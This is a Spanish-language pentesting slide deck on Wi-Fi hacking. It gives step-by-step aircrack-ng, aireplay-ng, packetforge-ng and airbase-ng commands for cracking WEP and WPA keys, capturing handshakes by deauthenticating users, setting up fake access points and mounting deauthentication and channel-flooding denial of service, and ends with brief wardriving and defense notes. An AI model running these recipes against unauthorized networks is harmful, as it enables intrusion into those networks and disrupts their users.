Hacking WIFI.

Pentester Rafael Gómez Del Ángel Director de N3XAsec

HistoriaWi-Fi (pronunciado en español /wɪfɪ/ y en inglés /waɪfaɪ/), siglas en inglés de Wireless Fidelity, es un sistema de envío de datos sobre redescomputacionales que utiliza ondas de radio en lugar de cables, además es una marca de la Wi-Fi Alliance (anteriormente la WECA: Wireless Ethernet Compatibility Alliance), la organización comercial que adopta, prueba y certifica que los equipos cumplen los estándares 802.11.

Puff Aburrida la historia

Definiciones·BSSID ·IVS

·SSID ·Mode monitor·AP ·WEP·STATION ·WPA·DOS

·Hacking WEP ·Hacking WPA·Fake AP·Wifi DOS (A usuarios y sobre saturación de frecuencias)

Que Ataques aremos?

Herramientas

·S.O Backtrack 5·Tarjeta Wifi chipset (Realtek)·Netsumbler·Wifi defender·Paranoid attack

Al ataque !!!

WEP

1.- Poner nuestra interfaz en modo monitor

2.-Cambiar nuestra MAC

3.-Capturar paquetes y elegir a la victima

·iwconfig wlan0 mode monitor

·macchanger –m “mac” wlan0

·airodump-ng -w “nombre arch” –c “canal” wlan0

4.-Asociarnos con el AP victima

5.-Inyeccion de trafico

6.-Obtener clave con Aircrack

·aireplay-ng -e “SSID” –a “BSSID” –h “mac” -1 -0 wlan0

·aireplay-ng –e “SSID” –h “mac” -3 wlan0

·aircrack-ng “captura.cap”

Chop-chop Attack·1.-iwconfig wlan0 mode monitor 2.-aireplay-ng –e ”SSID” –h “mac” -1 0 wlan0 3.-aireplay-ng -b “SSID” –h “mac” -4 (chop-chop)wlan04.-tcpdump –s 0 –n –e –r captura.cap

5.-packetforge-ng -0 –a “BSSID” –h “mac” –k “ip destino” –l “ip origen” –y “archivo xor creado.xor” –w “nuevocap.cap”

packetforge-ng -0 -a 00:14:95:ce:2e:11 -h 00:11:22:33:44:55 -k 192.168.1.140 -l 192.168.1.254 -y replay_dec-0920-161359.xor -w ddlr.cap

6.-aireplay-ng -2 –r “nuevo archivo .cap creado”

WPA

1.- Poner nuestra interfaz en modo monitor

2.-Cambiar nuestra MAC

3.-Capturar Handshake de la victima

·iwconfig wlan0 mode monitor

·macchanger –m “mac” wlan0

·airodump-ng -c “canal” --bssid “BSSID” –w psk wlan0

4.- Des autenticar a un usuario

5.-Iniciar Aircrack para encontrar pass

·aireplay-ng -0 -1 –a “BSSID” -c “usuario” wlan0

·aircrack-ng –w “diccionario.lst” –b “BSSID” psk*.cap

Fake Ap como método

De Ataque y contra Ataque

Fake Ap Contra ataque

*Configurar encriptaciones*Generar decenas de redes configurando “Paranoid attack”*Aumentar trafico

1.-Configurar la interfaz en modo monitor 2.- airbase-ng -P -C 30 -e “fake Ap” -a “fake mac” wlan0 –v

DOS (Denial of service)En redes Wifi

*Sobre saturacion de Frecuencias

*Des-autentificacion infinita de usuarios

Sobre saturacion de frecuencias

Wifi1.-Configurar la interfaz en modo monitor 2.-Generar cientos de redes con “Paranoid attack”la clave de este ataque es la configuración de las redes creadas todas en el mismo canal el cual la red wifi victima este trabajando.(Si se cuenta con mas de una interfaz mas efectivo será el ataque)

Des-autentificacion infinita de usuarios

1.-Configurar la interfaz en modo monitor 2.- aireplay-ng -0 -0 –a “BSSID” -c “usuario” wlan0

Detección y AnálisisWardriving

WardrivingDefinición:Se llama Wardriving a la búsqueda de redes inalámbricas Wi-Fi desde un vehículo en movimiento. Implica usar un coche o camioneta y un ordenador equipado con Wi-Fi, como un portátil o una PDA, para detectar las redes. Esta actividad es parecida al uso de un escáner para radio.

El Wardriving recibe su nombre del wardialing (popularizado en la película de Matthew Broderick Juegos de guerra) porque también implica buscar sistemas informáticos.

SoftwarerNetsumbler * Verificar la configuración de nuestra red.

• * Estudiar la cobertura o nivel de señal que tenemos en diferentes puntos de una estancia.

• * Detectar redes que pueden causar interferencias a la nuestra.

• * Útil para orientar antenas direccionales cuando queremos hacer enlaces de larga distancia, o simplemente para colocar la antena o tarjeta en el punto con mejor calidad de la señal.

• * Sirve para detectar puntos de acceso no autorizados (Rogue AP’s).

• * Wardriving, es decir, detectar todos los Puntos de Acceso (AP's) que están a nuestro alrededor.

SoftwarerEasy wifi radar

Fácil y sencillo radar que detecta puntos de acceso el cual facilita la localización de ellos e intenta conectar con redes sin protección

Prevencion Detección de intrusos y Recomendaciones

seguras

Software

*Wifi Defender

*Configuración

Detección de intrusos

*DHCP *Mac spoofing

*Fake AP *Configuración

*Potencia de transmisión *Encriptaciones

Consejos Seguros

Hacking WIFI.

Pentester Rafael Gómez Del Ángel Director de N3XAsec